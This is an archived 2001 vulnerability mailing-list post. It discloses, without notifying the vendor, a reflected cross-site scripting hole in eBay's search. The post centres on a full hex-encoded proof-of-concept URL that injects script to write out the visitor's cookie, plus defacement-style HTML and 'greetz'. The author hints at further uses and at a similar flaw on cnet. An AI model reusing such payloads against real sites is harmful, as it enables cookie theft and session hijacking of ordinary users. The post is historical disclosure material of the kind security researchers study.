Vulnerability Development mailing list archives
cross site scripting vulnerability on ebay.com
From: "- -" <phine () anonymous to>
Date: Tue, 18 Dec 2001 19:04:42 -0800
There is a cross-site scripting vulnerability within the search code @ ebay.com Below is the proof of concept URL & is harmless.. make sure it is entered exactly as it is shown. Of course, if you have ANY brains AT ALL.. you will verify the hex values in the URL before processing the link. Basically, it just document.write's the cookie that ebay.com stores in your browser. However, there are many more possibilities.. ebay has not been notified. http://cq-search.ebay.com/search/search.dll?query=%70%68%69%6e%65%20%30%77%6e%73%20%29%3c%2f%54%49%54%4c%45%3e%3c%53%43%52%49%50%54%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%42%3e%59%6f%75%72%20%43%6f%6f%6b%69%65%20%49%73%20%42%65%6c%6f%77%3a%3c%2f%42%3e%3c%42%52%20%2f%3e%27%20%2b%20%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%3c%2f%53%43%52%49%50%54%3e<BR+/><CENTER><B>...Your+0wner+is+above...</B><BR+/>(in+the+TITLE+tag...+d0h!)<P+/>..<B>greetz</B>..<BR+/>s1gnal_9,+Narr0w,+%23!security+and+PBS+;]</CENTER><P+/><FONT+FACE="Arial"+SIZE="2px"><B>So+many+new+IE+bugz+out...+So+many+new+possibilities!</B><BR+/>Where+Do+You+Want+To+Go+Today?®</FONT><P+/><TITLE>+(+heh. Try playing with cnet /*you just might find something interesting*/ ;] 'phine ------------------------------------------------------------ This email was sent through the free email service at http://www.anonymous.to/ To report abuse, please visit our website and click 'Contact Us.'
Current thread:
- cross site scripting vulnerability on ebay.com - - (Dec 18)